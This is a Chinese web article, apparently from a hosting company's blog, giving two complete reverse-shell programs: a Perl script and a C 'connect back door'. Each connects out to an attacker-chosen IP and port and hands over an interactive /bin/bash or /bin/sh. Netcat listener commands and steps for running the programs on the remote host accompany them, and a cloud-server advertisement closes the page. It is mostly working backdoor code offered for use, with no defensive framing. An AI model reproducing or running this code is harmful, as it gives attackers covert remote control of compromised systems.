反弹shell-创新互联
#!/usr/bin/perl -w
#
use strict;
use Socket;
use I:Handle;
if($#ARGV+1 != 2){
print “$#ARGV $0 Remote_IP Remote_Port \n”;
exit 1;
}
my $remote_ip = $ARGV[0];
my $remote_port = $ARGV[1];
my $proto = getprotobyname(“tcp”);
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));
my $shell = ‘/bin/bash -i’;
socket(SOCK, AF_INET, SOCK_STREAM, $proto);
STDOUT->autoflush(1);
SOCK->autoflush(1);
connect(SOCK,$pack_addr) or die “can not connect:$!”;
open STDIN, “<&SOCK”;
open STDOUT, “>&SOCK”;
open STDERR, “>&SOCK”;
print “Enjoy the shell.\n”;
system($shell);
close SOCK;
exit 0;
本机执行netcat.命令
nc -l -p 8080 -vv
远程:
./tcp.pl yourip 8080
perl和bash路径要自己修改,不过一般不用修改的.
文件改为755再运行.否则执行不起来
#include
#include
#include
#include
#include
#include
#include
void usage();
char shell[]=”/bin/sh”;
char message[]=”s8s8 welcome\n”;
int sock;
int main(int argc, char *argv[]) {
if(argc <3){
usage(argv[0]);
}
struct sockaddr_in server;
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf(“Couldn’t make socket!\n”); exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(atoi(argv[2]));
server.sin_addr.s_addr = inet_addr(argv[1]);
if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {
printf(“Could not connect to remote shell!\n”);
exit(-1);
}
send(sock, message, sizeof(message), 0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl(shell,”/bin/sh”,(char *)0);
close(sock);
return 1;
}
void usage(char *prog[]) {
printf(“\t\ts8s8 connect back door\n\n”);
printf(“\t sql@s8s8.net\n\n“);
printf(“Usage: %s
exit(-1);
}
gcc -o f f.c
再在本机上监听一个端口
nc -l -p 8888
再执行./f 192.168.1.14 8888
注:反弹回来的 shell没提示符。
另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。
文章标题:反弹shell-创新互联
网页网址:http://scjbc.cn/article/cdcccs.html